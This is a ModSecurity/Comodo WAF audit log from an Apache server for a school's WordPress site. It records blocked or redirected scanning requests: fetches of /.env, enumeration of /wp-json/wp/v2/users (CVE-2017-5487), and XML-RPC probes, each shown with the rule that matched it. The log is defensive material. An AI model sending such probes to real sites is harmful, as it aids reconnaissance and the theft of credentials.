--f9f92963-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.60.236.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.60.236.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f9f92963-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9f92963-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747481375936085 3004 (- - -) Stopwatch2: 1747481375936085 3004; combined=1402, p1=462, p2=906, p3=0, p4=0, p5=33, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9f92963-Z-- --04dafe1d-A-- [17/May/2025:18:38:08 +0700] aCh1IHyxdQCiyU1ENFdS-gAAAAY 103.236.140.4 34994 103.236.140.4 8181 --04dafe1d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.177 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --04dafe1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04dafe1d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747481888559599 1137 (- - -) Stopwatch2: 1747481888559599 1137; combined=392, p1=349, p2=0, p3=0, p4=0, p5=43, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04dafe1d-Z-- --dc19b301-A-- [17/May/2025:18:38:13 +0700] aCh1JRKi5m5upc8uMd7DVgAAANc 103.236.140.4 35068 103.236.140.4 8181 --dc19b301-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.177 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --dc19b301-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc19b301-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747481893186462 899 (- - -) Stopwatch2: 1747481893186462 899; combined=357, p1=315, p2=0, p3=0, p4=0, p5=42, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc19b301-Z-- --37537919-A-- [17/May/2025:20:06:33 +0700] aCiJ2XyxdQCiyU1ENFdxZAAAABI 103.236.140.4 59784 103.236.140.4 8181 --37537919-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.138.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.138.218 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --37537919-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37537919-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747487193268975 3337 (- - -) Stopwatch2: 1747487193268975 3337; combined=1520, p1=488, p2=998, p3=0, p4=0, p5=34, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37537919-Z-- --b1981a0d-A-- [17/May/2025:20:06:44 +0700] aCiJ5HyxdQCiyU1ENFdxdgAAAAQ 103.236.140.4 60024 103.236.140.4 8181 --b1981a0d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.138.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.138.218 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b1981a0d-C-- demo.sayHello --b1981a0d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1981a0d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747487204463733 7948 (- - -) Stopwatch2: 1747487204463733 7948; combined=6225, p1=622, p2=5350, p3=38, p4=41, p5=104, sr=77, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1981a0d-Z-- --b5f9cf59-A-- [17/May/2025:20:27:34 +0700] aCiOxum4kjNN-hEbWjKCrAAAAFI 103.236.140.4 56540 103.236.140.4 8181 --b5f9cf59-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.65.171.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.65.171.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b5f9cf59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5f9cf59-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747488454081644 3037 (- - -) Stopwatch2: 1747488454081644 3037; combined=1390, p1=464, p2=897, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5f9cf59-Z-- --534b1844-A-- [17/May/2025:20:34:09 +0700] aCiQURKi5m5upc8uMd7r3wAAAMU 103.236.140.4 36536 103.236.140.4 8181 --534b1844-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 134.199.149.50 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 134.199.149.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --534b1844-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --534b1844-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747488849790327 831 (- - -) Stopwatch2: 1747488849790327 831; combined=313, p1=264, p2=0, p3=0, p4=0, p5=49, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --534b1844-Z-- --47b43f29-A-- [17/May/2025:21:13:58 +0700] aCiZphKi5m5upc8uMd76eQAAANU 103.236.140.4 54010 103.236.140.4 8181 --47b43f29-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 182.93.75.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.93.75.217 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --47b43f29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47b43f29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747491238365039 2742 (- - -) Stopwatch2: 1747491238365039 2742; combined=1251, p1=431, p2=790, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47b43f29-Z-- --92bfd914-A-- [17/May/2025:21:25:51 +0700] aCicb3yxdQCiyU1ENFeKegAAABI 103.236.140.4 39588 103.236.140.4 8181 --92bfd914-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.134 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --92bfd914-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92bfd914-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747491951914534 2899 (- - -) Stopwatch2: 1747491951914534 2899; combined=1316, p1=450, p2=837, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92bfd914-Z-- --9b7ae471-A-- [17/May/2025:21:26:03 +0700] aCice3yxdQCiyU1ENFeKhQAAAAI 103.236.140.4 39804 103.236.140.4 8181 --9b7ae471-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.134 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9b7ae471-C-- demo.sayHello --9b7ae471-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b7ae471-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747491963273281 6475 (- - -) Stopwatch2: 1747491963273281 6475; combined=4758, p1=539, p2=3963, p3=60, p4=35, p5=95, sr=72, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b7ae471-Z-- --873d2140-A-- [17/May/2025:21:32:50 +0700] aCieEum4kjNN-hEbWjKSfAAAAEA 103.236.140.4 47656 103.236.140.4 8181 --873d2140-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 142.93.182.204 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 142.93.182.204 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36 --873d2140-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --873d2140-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747492370694712 753 (- - -) Stopwatch2: 1747492370694712 753; combined=311, p1=267, p2=0, p3=0, p4=0, p5=44, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --873d2140-Z-- --4bdfeb61-A-- [17/May/2025:21:52:42 +0700] aCiiugTOsBn9MSWb6WLE8QAAAII 103.236.140.4 42254 103.236.140.4 8181 --4bdfeb61-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.149 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4bdfeb61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4bdfeb61-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747493562681101 3890 (- - -) Stopwatch2: 1747493562681101 3890; combined=2161, p1=620, p2=1489, p3=0, p4=0, p5=52, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4bdfeb61-Z-- --69630169-A-- [17/May/2025:21:52:54 +0700] aCiixhKi5m5upc8uMd4GvQAAANU 103.236.140.4 42534 103.236.140.4 8181 --69630169-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.149 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --69630169-C-- demo.sayHello --69630169-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --69630169-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747493574681944 5743 (- - -) Stopwatch2: 1747493574681944 5743; combined=4186, p1=580, p2=3384, p3=32, p4=41, p5=89, sr=125, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69630169-Z-- --694c7c63-A-- [17/May/2025:22:00:52 +0700] aCikpHyxdQCiyU1ENFeVZQAAAAQ 103.236.140.4 52706 103.236.140.4 8181 --694c7c63-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --694c7c63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --694c7c63-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494052434865 4229 (- - -) Stopwatch2: 1747494052434865 4229; combined=2355, p1=713, p2=1604, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --694c7c63-Z-- --125c3126-A-- [17/May/2025:22:00:58 +0700] aCikqnyxdQCiyU1ENFeVbgAAAA8 103.236.140.4 52834 103.236.140.4 8181 --125c3126-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.80 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --125c3126-C-- demo.sayHello --125c3126-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --125c3126-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494058567244 6642 (- - -) Stopwatch2: 1747494058567244 6642; combined=5164, p1=576, p2=4324, p3=48, p4=67, p5=88, sr=75, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --125c3126-Z-- --03c1087c-A-- [17/May/2025:22:01:41 +0700] aCik1em4kjNN-hEbWjKZDAAAAEQ 103.236.140.4 53718 103.236.140.4 8181 --03c1087c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.208 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --03c1087c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03c1087c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494101823717 2511 (- - -) Stopwatch2: 1747494101823717 2511; combined=1258, p1=409, p2=819, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03c1087c-Z-- --159e2757-A-- [17/May/2025:22:01:48 +0700] aCik3ATOsBn9MSWb6WLHlgAAAJg 103.236.140.4 53826 103.236.140.4 8181 --159e2757-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.208 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.208 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --159e2757-C-- demo.sayHello --159e2757-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --159e2757-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494108737637 6301 (- - -) Stopwatch2: 1747494108737637 6301; combined=4646, p1=571, p2=3837, p3=31, p4=34, p5=103, sr=76, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --159e2757-Z-- --c431ad63-A-- [17/May/2025:22:04:03 +0700] aCilY3yxdQCiyU1ENFeWjwAAABA 103.236.140.4 56334 103.236.140.4 8181 --c431ad63-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.5 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c431ad63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c431ad63-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 